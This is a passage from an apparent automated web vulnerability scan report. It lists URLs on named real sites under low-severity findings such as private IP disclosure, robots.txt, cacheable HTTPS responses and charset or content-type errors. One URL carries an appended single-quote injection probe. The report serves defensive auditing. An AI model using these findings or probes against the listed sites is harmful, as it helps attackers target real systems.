27.10. http://hmficweb.hinghammutual.com/abouthingham/directorsandofficers/

27.11. http://hmficweb.hinghammutual.com/abouthingham/history/

27.12. http://hmficweb.hinghammutual.com/agencylocator/

27.13. http://hmficweb.hinghammutual.com/agents/

27.14. http://hmficweb.hinghammutual.com/billing/

27.15. http://hmficweb.hinghammutual.com/claims/

27.16. http://hmficweb.hinghammutual.com/contactus/

27.17. http://hmficweb.hinghammutual.com/contactus/Default.aspx

27.18. http://hmficweb.hinghammutual.com/default.aspx

27.19. http://hmficweb.hinghammutual.com/privacy/

27.20. http://hmficweb.hinghammutual.com/privacy/Default.aspx

27.21. http://hmficweb.hinghammutual.com/products/

27.22. http://hmficweb.hinghammutual.com/products/cascoauto/

27.23. http://hmficweb.hinghammutual.com/products/commercialinsurance/

27.24. http://hmficweb.hinghammutual.com/products/commercialinsurance/Default.aspx

27.25. http://hmficweb.hinghammutual.com/products/commercialinsurance/bop/

27.26. http://hmficweb.hinghammutual.com/products/commercialinsurance/inlandmarine/

27.27. http://hmficweb.hinghammutual.com/products/personal/

27.28. http://hmficweb.hinghammutual.com/reglogin.aspx

27.29. https://secure.trust-guard.com/ResetPassword.php

27.30. https://secure.trust-guard.com/index.php

27.31. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

27.32. http://tours.sapha.com/

27.33. http://www.advancedaccess.com/

27.34. http://www.advancedaccess.com/swf/swfobject.js

27.35. http://www.advisorsquare.com/design_gallery/fsplash/ProtectRClick.js

27.36. http://www.advisorsquare.com/new/asframeless02/content.asp

27.37. http://www.advisorsquare.com/new/asle05/content.asp

27.38. http://www.agentadvantage.com/

27.39. http://www.agentadvantage.com/resources/js/s_code.js

27.40. http://www.brownrudnick.com/nr/

27.41. http://www.caribbean-ocean.com/

27.42. http://www.caribbean-ocean.com/accommodation2.php

27.43. http://www.caribbean-ocean.com/index.php

27.44. http://www.caribbean-ocean.com/index.php/1'

27.45. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js

27.46. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js

27.47. https://www.clone-systems.com/ecommerce/checkout.php

27.48. https://www.clone-systems.com/ecommerce/login.php

27.49. http://www.cloneguard.com/favicon.ico

27.50. http://www.compliancepoint.com/sub_serv_isc_pci.asp

27.51. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js

27.52. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js

27.53. http://www.dominionenterprises.com/site/scripts/s_code.js

27.54. http://www.dynamicperimeter.com/scripts/jquery.swapimage.min.js

27.55. http://www.eneighborhoods.com/common/s_code.js

27.56. http://www.expedia.com/pubspec/scripts/include/overrideHelper.js

27.57. https://www.expedia.com/pubspec/scripts/include/overrideHelper.js

27.58. http://www.firstmateonline.com/businessinfo.php

27.59. http://www.google.com/search

27.60. http://www.gotoassist.com/en_US/pageNotFound.tmpl

27.61. http://www.gotoassist.com/favicon.ico

27.62. http://www.harrisconnect.com/templates/ja_mageia/ja_menus/ja_cssmenu/mootools.v1.1.js

27.63. http://www.hunton.com/include_common/jQuery/dimensions.js

27.64. http://www.hunton.com/include_common/jQuery/jqDnR.js

27.65. http://www.hunton.com/load.vcf

27.66. http://www.lbmc.com/landing/pci.htm

27.67. http://www.lbmc.com/sites/all/modules/extlink/extlink.js

27.68. http://www.millersweld.com/top.php

27.69. http://www.neospire.net/security-and-compliance/PCI-DSS.php

27.70. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp

27.71. http://www.nutter.com/attorneys.php

27.72. http://www.resiteonline.com/resite-login.js

27.73. http://www.scmagazineus.com/

27.74. http://www.scmagazineus.com/subscribe/section/122/

27.75. http://www.skichalets.co.uk/

27.76. http://www.socialfollow.com/blog/

27.77. https://www.trpc401k.com/script/mootools-1.2.4.2-more-yc.js

27.78. http://www.trpcweb.com/content/account-support

28. Private IP addresses disclosed

28.1. http://api.facebook.com/restserver.php

28.2. http://api.facebook.com/restserver.php

28.3. http://api.facebook.com/restserver.php

28.4. http://api.facebook.com/restserver.php

28.5. http://api.facebook.com/restserver.php

28.6. http://api.facebook.com/restserver.php

28.7. http://api.facebook.com/restserver.php

28.8. http://api.facebook.com/restserver.php

28.9. http://api.facebook.com/restserver.php

28.10. http://api.facebook.com/restserver.php

28.11. http://api.facebook.com/restserver.php

28.12. http://connect.facebook.net/en_US/all.js

28.13. http://dce.sapha.com/engine.php

28.14. http://media.expedia.com/ads/travelhook/travelhook.js

28.15. http://nba.scout.com/

28.16. http://recruiting.scout.com/Legacy/a.z

28.17. http://recruiting.scout.com/Legacy/a.z

28.18. http://scouthoops.scout.com/

28.19. http://static.ak.connect.facebook.com/images/connect_sprite.png

28.20. http://static.ak.fbcdn.net/connect.php/js/FB.Share

28.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.22. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.23. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.24. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/w8K2nfDzJmR.css

28.25. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/a9SKJ-iPf9Q.css

28.26. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

28.27. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/xmrVYX_SMcv.css

28.28. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png

28.29. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/bSOHtKbCGYI.png

28.30. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/tgCjNDQG0qU.png

28.31. http://support.expedia.com/app/answers/list/

28.32. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

28.33. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

28.34. http://tours.sapha.com/

28.35. http://www.expedia.com/pub/agent.dll

28.36. http://www.expedia.com/pub/agent.dll

28.37. http://www.expedia.com/pub/agent.dll

28.38. http://www.expedia.com/pub/agent.dll

28.39. http://www.expedia.com/pub/agent.dll

28.40. http://www.expedia.com/pub/agent.dll

28.41. http://www.expedia.com/pub/agent.dll

28.42. http://www.expedia.com/pub/agent.dll

28.43. http://www.expedia.com/pub/agent.dll

28.44. https://www.expedia.com/pub/agent.dll

28.45. https://www.expedia.com/pub/agent.dll

28.46. https://www.expedia.com/pub/agent.dll

28.47. https://www.expedia.com/pub/agent.dll

28.48. https://www.expedia.com/pub/agent.dll

28.49. https://www.expedia.com/pub/agent.dll

28.50. https://www.expedia.com/pub/agent.dll

28.51. http://www.facebook.com/SocialFollow

28.52. http://www.facebook.com/extern/login_status.php

28.53. http://www.facebook.com/extern/login_status.php

28.54. http://www.facebook.com/extern/login_status.php

28.55. http://www.facebook.com/extern/login_status.php

28.56. http://www.facebook.com/extern/login_status.php

28.57. http://www.facebook.com/extern/login_status.php

28.58. http://www.facebook.com/extern/login_status.php

28.59. http://www.facebook.com/extern/login_status.php

28.60. http://www.facebook.com/extern/login_status.php

28.61. http://www.facebook.com/extern/login_status.php

28.62. http://www.facebook.com/extern/login_status.php

28.63. http://www.facebook.com/extern/login_status.php

28.64. http://www.facebook.com/extern/login_status.php

28.65. http://www.facebook.com/extern/login_status.php

28.66. http://www.facebook.com/extern/login_status.php

28.67. http://www.facebook.com/extern/login_status.php

28.68. http://www.facebook.com/extern/login_status.php

28.69. http://www.facebook.com/extern/login_status.php

28.70. http://www.facebook.com/images/loaders/indicator_black.gif

28.71. http://www.facebook.com/plugins/activity.php

28.72. http://www.facebook.com/plugins/activity.php

28.73. http://www.facebook.com/plugins/activity.php

28.74. http://www.facebook.com/plugins/like.php

28.75. http://www.facebook.com/plugins/like.php

28.76. http://www.facebook.com/plugins/like.php

28.77. http://www.facebook.com/plugins/like.php

28.78. http://www.facebook.com/plugins/like.php

28.79. http://www.facebook.com/plugins/like.php

28.80. http://www.facebook.com/plugins/like.php

28.81. http://www.facebook.com/plugins/like.php

28.82. http://www.facebook.com/plugins/like.php

28.83. http://www.facebook.com/plugins/like.php

28.84. http://www.facebook.com/plugins/like.php

28.85. http://www.facebook.com/plugins/like.php

28.86. http://www.facebook.com/plugins/like.php

28.87. http://www.facebook.com/plugins/like.php

28.88. http://www.facebook.com/plugins/like.php

28.89. http://www.facebook.com/plugins/like.php

28.90. http://www.facebook.com/plugins/like.php

28.91. http://www.facebook.com/plugins/like.php

28.92. http://www.facebook.com/plugins/like.php

28.93. http://www.facebook.com/plugins/like.php

28.94. http://www.facebook.com/plugins/like.php

28.95. http://www.facebook.com/plugins/like.php

28.96. http://www.facebook.com/plugins/like.php

28.97. http://www.facebook.com/plugins/like.php

28.98. http://www.facebook.com/plugins/like.php

28.99. http://www.facebook.com/plugins/like.php

28.100. http://www.facebook.com/plugins/like.php

28.101. http://www.facebook.com/plugins/like.php

28.102. http://www.facebook.com/plugins/like.php

28.103. http://www.facebook.com/plugins/like.php

28.104. http://www.facebook.com/plugins/like.php

28.105. http://www.facebook.com/plugins/like.php

28.106. http://www.facebook.com/plugins/like.php

28.107. http://www.facebook.com/plugins/like.php

28.108. http://www.facebook.com/plugins/like.php

28.109. http://www.facebook.com/plugins/like.php

28.110. http://www.facebook.com/plugins/like.php

28.111. http://www.facebook.com/plugins/like.php

28.112. http://www.facebook.com/plugins/like.php

28.113. http://www.facebook.com/plugins/like.php

28.114. http://www.facebook.com/plugins/like.php

28.115. http://www.facebook.com/plugins/like.php

28.116. http://www.facebook.com/plugins/like.php

28.117. http://www.facebook.com/plugins/like.php

28.118. http://www.facebook.com/plugins/like.php

28.119. http://www.facebook.com/plugins/like.php

28.120. http://www.facebook.com/plugins/like.php

28.121. http://www.facebook.com/plugins/like.php

28.122. http://www.facebook.com/plugins/like.php

28.123. http://www.facebook.com/plugins/like.php

28.124. http://www.facebook.com/plugins/like.php

28.125. http://www.facebook.com/plugins/like.php

28.126. http://www.facebook.com/plugins/like.php

28.127. http://www.facebook.com/plugins/like.php

28.128. http://www.facebook.com/plugins/like.php

28.129. http://www.facebook.com/plugins/like.php

28.130. http://www.facebook.com/plugins/like.php

28.131. http://www.facebook.com/plugins/like.php

28.132. http://www.facebook.com/plugins/like.php

28.133. http://www.facebook.com/plugins/like.php

28.134. http://www.facebook.com/plugins/like.php

28.135. http://www.facebook.com/plugins/like.php

28.136. http://www.facebook.com/plugins/like.php

28.137. http://www.facebook.com/plugins/like.php

28.138. http://www.facebook.com/plugins/likebox.php

28.139. http://www.google.com/sdch/vD843DpA.dct

28.140. http://www.millerwelds.com/favicon.ico

28.141. http://www.millerwelds.com/financing/images/darkhead_min.png

28.142. http://www.millerwelds.com/financing/images/lighthead_min.png

28.143. http://www.millerwelds.com/financing/images/plinenavbody_min.png

28.144. http://www.millerwelds.com/financing/images/plinenavfoot_min.png

28.145. http://www.millerwelds.com/financing/images/plinenavhead_min.png

28.146. http://www.millerwelds.com/financing/images/powerline_bg.png

28.147. http://www.millerwelds.com/financing/images/powerline_head.png

28.148. http://www.millerwelds.com/images/footer-social-sprite.jpg

28.149. http://www.millerwelds.com/images/go-search.jpg

28.150. http://www.millerwelds.com/images/logo_printable.gif

28.151. http://www.millerwelds.com/images/nav-new/aboutus.gif

28.152. http://www.millerwelds.com/images/nav-new/blog.gif

28.153. http://www.millerwelds.com/images/nav-new/forums.gif

28.154. http://www.millerwelds.com/images/nav-new/indust_interests.gif

28.155. http://www.millerwelds.com/images/nav-new/powerclick01.gif

28.156. http://www.millerwelds.com/images/nav-new/products.gif

28.157. http://www.millerwelds.com/images/nav-new/resources.gif

28.158. http://www.millerwelds.com/images/nav-new/service.gif

28.159. http://www.millerwelds.com/images/nav-new/wheretobuy.gif

28.160. http://www.millerwelds.com/images/navicons.png

28.161. http://www.scout.com/

28.162. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z

28.163. http://www.scout.com/2/a.z

28.164. http://www.scout.com/2/a.z

28.165. http://www.scout.com/2/a.z

28.166. http://www.scout.com/2/a.z

28.167. http://www.scout.com/2/a.z

28.168. http://www.scout.com/2/a.z

28.169. http://www.scout.com/2/a.z

28.170. http://www.scout.com/2/a.z

28.171. http://www.scout.com/2/a.z

28.172. http://www.scout.com/Legacy/a.z

28.173. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z

28.174. http://www.scout.com/a.z

28.175. http://www.scout.com/a.z

28.176. http://www.scout.com/a.z

28.177. http://www.scout.com/a.z

28.178. http://www.scout.com/a.z

28.179. http://www.scout.com/a.z

28.180. http://www.scout.com/a.z

28.181. http://www.scout.com/a.z

28.182. http://www.scout.com/a.z

28.183. http://www.scout.com/a.z

28.184. http://www.scout.com/search.aspx

29. Robots.txt file

29.1. http://381-kpd-482.mktoresp.com/webevents/visitWebPage

29.2. http://4qinvite.4q.iperceptions.com/1.aspx

29.3. http://797-pwy-691.mktoresp.com/webevents/visitWebPage

29.4. http://a.rad.msn.com/ADSAdClient31.dll

29.5. http://ad.doubleclick.net/adj/scmag.hmktus/sc

29.6. http://admin.instantservice.com/resources/smartbutton/5371/II_Servers.js

29.7. http://ads.allatsea.net/www/delivery/spcjs.php

29.8. http://adsfac.us/ag.asp

29.9. http://allatsea.net/

29.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

29.11. http://api.facebook.com/restserver.php

29.12. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

29.13. http://apps.sapha.com/appshandler.php

29.14. http://as.casalemedia.com/j

29.15. http://b.rad.msn.com/ADSAdClient31.dll

29.16. https://broker.gotoassist.com/h/lbmc

29.17. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx

29.18. http://cdn-forums.scout.com/adfeed.ashx

29.19. http://clients1.google.com/webpagethumbnail

29.20. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

29.21. http://d.xp1.ru4.com/activity

29.22. http://dce.sapha.com/engine.php

29.23. http://dinclinx.com/

29.24. http://expedia-www.baynote.net/baynote/tags3/common

29.25. http://expedia.com/

29.26. http://fls.doubleclick.net/activityi

29.27. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

29.28. http://googleads.g.doubleclick.net/pagead/ads

29.29. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus/1/H.21/s84503894906956

29.30. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js

29.31. http://int.teracent.net/tase/int

29.32. http://jlinks.industrybrains.com/jsct

29.33. http://l.addthiscdn.com/live/t00/250lo.gif

29.34. https://mosaicsecurity.com/products/1919-pci-scan-annual

29.35. http://nba.scout.com/

29.36. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.37. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

29.38. http://p.addthis.com/pixel

29.39. http://poll.websitegear.com/compactpoll.asp

29.40. http://pub.kroogy.com/www/delivery/ajs.php

29.41. http://rad.msn.com/ADSAdClient31.dll

29.42. http://recruiting.scout.com/favicon.ico

29.43. http://s7.addthis.com/js/250/addthis_widget.js

29.44. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYrIUDILCFAzIFrMIAAB8

29.45. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.46. http://scouthoops.scout.com/

29.47. https://seals.networksolutions.com/siteseal_seek/siteseal

29.48. http://search.twitter.com/search.json

29.49. http://segment-pixel.invitemedia.com/pixel

29.50. http://spe.atdmt.com/ds/M8MEDPMPRPPR/PP.1001_machupicchu_01_300x250_eng.jpg

29.51. http://static.ak.fbcdn.net/connect/xd_proxy.php

29.52. http://static01.linkedin.com/scds/concat/common/css

29.53. http://static02.linkedin.com/scds/concat/common/js

29.54. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

29.55. http://suth.com/

29.56. http://sync.mathtag.com/sync/img

29.57. http://themes.googleusercontent.com/font

29.58. http://toolbarqueries.clients.google.com/tbproxy/af/query

29.59. http://tours.sapha.com/

29.60. http://track.websiteceo.com/m/

29.61. http://va.px.invitemedia.com/pixel

29.62. http://verify.authorize.net/anetseal/seal.js

29.63. https://verify.authorize.net/anetseal/

29.64. http://widgets.digg.com/buttons/count

29.65. http://www.advancedaccess.com/

29.66. http://www.bizographics.com/collect/

29.67. http://www.clone-systems.com/resell-clone-guard.html

29.68. https://www.clone-systems.com/ecommerce/checkout.php

29.69. http://www.cloneguard.com/pci-scanning.asp

29.70. http://www.dynamicperimeter.com/styles/i/arrows-ffffff.png

29.71. http://www.eneighborhoods.com/

29.72. http://www.expedia.com/daily/styles/3ColFlex1024.css

29.73. https://www.expedia.com/pub/agent.dll

29.74. http://www.facebook.com/plugins/activity.php

29.75. http://www.fiddler2.com/fiddler2/updatecheck.asp

29.76. http://www.google-analytics.com/__utm.gif

29.77. http://www.google.com/uds/

29.78. https://www.google.com/searchdomaincheck

29.79. http://www.googleadservices.com/pagead/conversion/1070200079/

29.80. http://www.gotoassist.com/ph/lbmc

29.81. http://www.harrisconnect.com/plugins/system/yoo_effects/yoo_effects.js.php

29.82. http://www.hunton.com/

29.83. http://www.lbmc.com/landing/pci.htm

29.84. http://www.leadlife.com/analytics/lla.aspx

29.85. http://www.linkedin.com/pub/social-follow/12/7a2/294

29.86. http://www.millersweld.com/error.html

29.87. http://www.millerwelds.com/financing/index.php

29.88. http://www.neospire.net/security-and-compliance/PCI-DSS.php

29.89. http://www.nextadvisor.com/includes/javascript.php

29.90. http://www.resiteonline.com/

29.91. http://www.sapha.com/

29.92. http://www.scmagazineus.com/

29.93. http://www.scout.com/favicon.ico

29.94. http://www.skichalets.co.uk/top/crossfader.js

29.95. http://www.socialfollow.com/button/image/

29.96. http://www.sutherlandglobal.com/

29.97. http://www.trpcweb.com/

30. Cacheable HTTPS response

30.1. https://broker.gotoassist.com/javaScriptTester.tmpl

30.2. https://events.gsmiweb.com/favicon.ico

30.3. https://mosaicsecurity.com/products/1919-pci-scan-annual

30.4. https://seals.networksolutions.com/siteseal_seek/siteseal

30.5. https://secure.opinionlab.com/ccc01/comment_card.asp

30.6. https://subscribe.haymarketmedia.com/scm/

30.7. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

30.8. https://www.expedia.com/pub/agent.dll

30.9. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

30.10. https://www.fiddler2.com/dl/Fiddler2BetaSetup.exe

30.11. https://www.google.com/searchdomaincheck

30.12. https://www.mavitunasecurity.com/support/checkupdate/

30.13. https://www.mavitunasecurity.com/welcome/

30.14. https://www.taxnotebook.com/CopyRightTN.htm

30.15. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico

31. HTML does not specify charset

31.1. https://events.gsmiweb.com/css/gsmi_events.css

31.2. https://events.gsmiweb.com/events.php

31.3. https://events.gsmiweb.com/images/getconnected_fb.png

31.4. https://events.gsmiweb.com/images/getconnected_linkedin.png

31.5. https://events.gsmiweb.com/images/getconnected_rss.png

31.6. https://events.gsmiweb.com/images/getconnected_twitter.png

31.7. https://events.gsmiweb.com/images/getconnected_youtube.png

31.8. https://events.gsmiweb.com/subscribe.php

31.9. http://fls.doubleclick.net/activityi

31.10. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js

31.11. http://hmficweb.hinghammutual.com/admin//reglogin.aspx%3fReturnUrl%3d%252fadmin%252fDefault.aspx

31.12. http://hmficweb.hinghammutual.com/billing_view/

31.13. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

31.14. http://hmficweb.hinghammutual.com/billing_view/login.asp

31.15. http://hmficweb.hinghammutual.com/css/

31.16. http://hmficweb.hinghammutual.com/images/

31.17. http://hmficweb.hinghammutual.com/images/content/

31.18. http://hmficweb.hinghammutual.com/images/content/login/

31.19. http://hmficweb.hinghammutual.com/images/home/

31.20. http://hmficweb.hinghammutual.com/includes/

31.21. http://kroogy.com/pub/banner_160_600.php

31.22. http://kroogy.com/pub/banner_728_90_random.php

31.23. http://lbmc.imonitor.net/

31.24. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

31.25. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

31.26. http://login.vindicosuite.com/vindico_dynamic.asp

31.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.28. http://tags.bluekai.com/site/2576

31.29. http://www.advancedaccess.com/

31.30. http://www.advancedaccess.com/swf/swfobject.js

31.31. http://www.advisorsquare.com/useradmin/Authenticate.asp

31.32. http://www.caribbean-ocean.com/

31.33. http://www.caribbean-ocean.com/accommodation2.php

31.34. http://www.caribbean-ocean.com/index.php

31.35. http://www.caribbean-ocean.com/index.php/1'

31.36. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91

31.37. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105

31.38. http://www.caribbean-ocean.com/styles.css

31.39. http://www.caribbean-ocean.com/tabs.js

31.40. http://www.cloneguard.com/favicon.ico

31.41. http://www.compliancepoint.com/sub_serv_isc_pci.asp

31.42. http://www.eneighborhoods.com/favicon.ico

31.43. http://www.eneighborhoods.com/menu/homepage/menu.css

31.44. http://www.eneighborhoods.com/menu/menu.css

31.45. http://www.eneighborhoods.com/menu/mm_css_menu.js

31.46. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

31.47. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

31.48. http://www.ezflexplan.com/ContentPages/employers.html

31.49. http://www.ezflexplan.com/ContentPages/er_admintls.html

31.50. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html

31.51. http://www.ezflexplan.com/ContentPages/er_htsuap.html

31.52. http://www.ezflexplan.com/ContentPages/nav_employers.html

31.53. http://www.ezflexplan.com/navigation/frameset.asp

31.54. http://www.ezflexplan.com/navigation/menu.asp

31.55. http://www.firstmateonline.com/businessinfo.php

31.56. http://www.gofileroom.com/SessionRelease.asp

31.57. http://www.gofileroom.com/lbmc/

31.58. https://www.gofileroom.com/lbmc/Default.asp

31.59. http://www.hunton.com/FCWSite/Features/_xpress/

31.60. http://www.millersweld.com/error.html

31.61. http://www.networksolutions.com/jsonBrowserInfo.do

31.62. http://www.nextadvisor.com/includes/javascript.php

31.63. http://www.nutter.com/attorneys.php

31.64. http://www.nutter.com/careers.php

31.65. http://www.nutter.com/home.php

31.66. http://www.skichalets.co.uk/top/Crossfader.js

31.67. http://www.socialfollow.com/button/image/

31.68. http://www.socialfollow.com/js/flash-detect.js

31.69. http://www.socialfollow.com/js/jquery.js

31.70. http://www.socialfollow.com/js/thickbox.js

31.71. http://www.socialfollow.com/js/validator.js

31.72. https://www.taxnotebook.com/CopyRightTN.htm

32. HTML uses unrecognised charset

32.1. https://secure.opinionlab.com/ccc01/comment_card.asp

32.2. http://www.advisorsquare.com/new/asle05/content.asp

33. Content type incorrectly stated

33.1. http://a.rad.msn.com/ADSAdClient31.dll

33.2. http://a1.twimg.com/profile_images/258292367/av-2_normal.gif

33.3. http://a2.twimg.com/profile_images/58727890/PIA08370_normal.png

33.4. http://a3.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif

33.5. http://allatsea.net/assets/social/find_us_on_facebook.png

33.6. http://b.rad.msn.com/ADSAdClient31.dll

33.7. https://broker.gotoassist.com/javaScriptTester.tmpl

33.8. http://dce.sapha.com/engine.php

33.9. https://events.gsmiweb.com/favicon.ico

33.10. http://expedia-www.baynote.net/baynote/tags3/common

33.11. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

33.12. http://hmficweb.hinghammutual.com/images/leftcolumn/photo-agents.jpg

33.13. http://learn.bridgefront.com/favicon.ico

33.14. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

33.15. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.16. http://poll.websitegear.com/compactpoll.asp

33.17. http://rad.msn.com/ADSAdClient31.dll

33.18. http://sales.liveperson.net/hcp/html/mTag.js

33.19. http://seal.globalsign.com/SiteSeal/gs_image_130-65_en.js

33.20. http://st.madisonlogic.com/images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg

33.21. http://st.madisonlogic.com/images/userlogo/2/2931_Arbor_Logo.jpg

33.22. http://st.madisonlogic.com/images/userlogo/3/3189_HP_S64_Logo.jpg

33.23. http://support.expedia.com/ci/ajaxRequest/getReportData

33.24. http://verify.authorize.net/anetseal/images/secure90x72.gif

33.25. https://verify.authorize.net/anetseal/images/secure90x72.gif

33.26. http://www.advisorsquare.com/design_gallery/welcome/HP_pict1.jpg

33.27. http://www.advisorsquare.com/design_gallery/welcome/HP_pict2.jpg

33.28. http://www.advisorsquare.com/design_gallery/welcome/HP_pict3.jpg

33.29. http://www.advisorsquare.com/design_gallery/welcome/HP_pict4.jpg

33.30. http://www.advisorsquare.com/new/AccountantSquareDemo/tax_calendar.jpg

33.31. http://www.advisorsquare.com/new/BrochureLevel/GA15_banner.jpg

33.32. http://www.advisorsquare.com/new/BrochureLevel/HP_pict2.jpg

33.33. http://www.advisorsquare.com/new/BrochureLevel/HP_pict3.jpg

33.34. http://www.advisorsquare.com/new/BrochureLevel/HP_welcomePhoto.jpg

33.35. http://www.advisorsquare.com/new/BusinessLevel/FA09Banner.jpg

33.36. http://www.advisorsquare.com/new/BusinessLevel/HP_pict1.jpg

33.37. http://www.advisorsquare.com/new/BusinessLevel/HP_pict2.jpg

33.38. http://www.advisorsquare.com/new/BusinessLevel/HP_pict3.jpg

33.39. http://www.advisorsquare.com/new/BusinessLevel/HP_pict4.jpg

33.40. http://www.advisorsquare.com/new/PremiumLevel/FA03Banner.jpg

33.41. http://www.advisorsquare.com/new/PremiumLevel/HP_pict3.jpg

33.42. http://www.advisorsquare.com/new/PremiumLevel/HP_pict4.jpg

33.43. http://www.advisorsquare.com/new/PremiumLevel/leftframe.jpg

33.44. http://www.advisorsquare.com/new/asframeless02/Business02_asBanner.jpg

33.45. http://www.advisorsquare.com/new/asframeless02/banner_bus02.jpg

33.46. http://www.advisorsquare.com/new/asle04/L3company_pict1.jpg

33.47. http://www.advisorsquare.com/new/asle04/L3company_pict2.jpg

33.48. http://www.advisorsquare.com/new/asle04/L3links_pict1.jpg

33.49. http://www.advisorsquare.com/new/asle04/L3links_pict2.jpg

33.50. http://www.advisorsquare.com/new/asle04/L3products_pict1.jpg

33.51. http://www.advisorsquare.com/new/asle04/home_01.jpg

33.52. http://www.advisorsquare.com/new/asle04/home_02.jpg

33.53. http://www.advisorsquare.com/new/asle04/home_03.jpg

33.54. http://www.advisorsquare.com/new/asle04/place_banner.jpg

33.55. http://www.advisorsquare.com/new/asle05/HP_pict2.jpg

33.56. http://www.advisorsquare.com/new/asle05/asle05_banner.jpg

33.57. http://www.advisorsquare.com/new/asle05/menubg.jpg

33.58. http://www.agentadvantage.com/favicon.ico

33.59. http://www.angege.com/links.php

33.60. http://www.btamericascareers.com/furniture/IT_WhatsInItForYou.gif

33.61. http://www.caribbean-ocean.com/styles.css

33.62. http://www.caribbean-ocean.com/tabs.js

33.63. http://www.dhmiservices.com/ClickContact/js.ashx

33.64. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js

33.65. http://www.dynamicperimeter.com/styles/favicon.ico

33.66. http://www.expedia.com/daily/js/flash.vbs

33.67. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

33.68. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

33.69. http://www.facebook.com/extern/login_status.php

33.70. http://www.firstmateonline.com/businessinfo.php

33.71. http://www.google.com/mbd

33.72. http://www.google.com/search

33.73. http://www.lbmc.com/favicon.ico

33.74. http://www.lbmc.com/misc/favicon.ico

33.75. http://www.lbmc.com/sites/default/files/imagecache/profile-150x200/gherman.jpg

33.76. https://www.mavitunasecurity.com/support/checkupdate/

33.77. http://www.millerwelds.com/favicon.ico

33.78. http://www.networksolutions.com/jsonBrowserInfo.do

33.79. http://www.nextadvisor.com/includes/javascript.php

33.80. http://www.scout.com/2/a.z

33.81. http://www.scout.com/webproxy.ashx

33.82. http://www.secureworks.com/images/rssfeed.gif

33.83. http://www.skichalets.co.uk/top/Crossfader.js

33.84. http://www.socialfollow.com/button/image/

33.85. http://www.socialfollow.com/js/flash-detect.js

33.86. http://www.socialfollow.com/js/jquery.js

33.87. http://www.socialfollow.com/js/thickbox.js

33.88. http://www.socialfollow.com/js/validator.js

33.89. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg

33.90. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg

33.91. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg

33.92. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-white_05.jpg

